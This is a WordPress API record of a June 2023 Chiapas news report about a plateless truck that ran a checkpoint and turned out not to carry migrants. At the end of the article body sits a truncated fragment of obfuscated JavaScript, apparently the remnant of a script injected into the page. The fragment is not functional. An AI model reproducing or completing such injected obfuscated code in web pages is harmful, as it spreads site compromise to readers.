{"id":10411,"date":"2023-06-07T02:48:57","date_gmt":"2023-06-07T02:48:57","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10411"},"modified":"2023-06-07T02:48:58","modified_gmt":"2023-06-07T02:48:58","slug":"unidad-con-presuntos-migrantes-causa-gran-movilizacion-policiaca","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10411","title":{"rendered":"Unidad con presuntos migrantes causa gran movilizaci\u00f3n polic\u00edaca"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686105988368-1024x576.jpg\" alt=\"\" class=\"wp-image-10412\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686105988368-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686105988368-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686105988368-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686105988368.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 6 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un cami\u00f3n con presuntos migrantes en el tramo Tuxtla-Chiapa de Corzo caus\u00f3 alarma y una gran movilizaci\u00f3n polic\u00edaca este martes por la ma\u00f1ana.<\/p>\n\n\n\n<p>De acuerdo con los primeros reportes, este hecho ocurri\u00f3 cuando un cami\u00f3n de 20 toneladas de color gris sin placas de circulaci\u00f3n corr\u00eda en el sentido de Oriente a Poniente en este punto, y al pasar por el punto de revisi\u00f3n le marcaron el alto pero no se detuvo.<\/p>\n\n\n\n<p>Esta acci\u00f3n gener\u00f3 alerta en las autoridades e inmediatamente se movilizaron elementos municipales, estatales de la Guardia Nacional.<\/p>\n\n\n\n<p>Fue hasta la altura de la Prepa 5 donde le dieron alcance y los uniformados obligaron al conductor a detenerse.<\/p>\n\n\n\n<p>Tras una inspecci\u00f3n, se descart\u00f3 que la unidad transportaba migrantes.<\/p>\n\n\n\n<p>El chofer de la pesada unidad fue detenido y puesto a disposici\u00f3n para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 6 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un cami\u00f3n con presuntos migrantes en el tramo Tuxtla-Chiapa de Corzo caus\u00f3 alarma y una gran movilizaci\u00f3n polic\u00edaca este martes por la ma\u00f1ana. De acuerdo con los primeros reportes, este hecho ocurri\u00f3 cuando un cami\u00f3n de 20 toneladas de color gris sin placas &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10412,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10411","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10411","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10411"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10411\/revisions"}],"predecessor-version":[{"id":10413,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10411\/revisions\/10413"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10412"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10411"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10411"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10411"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}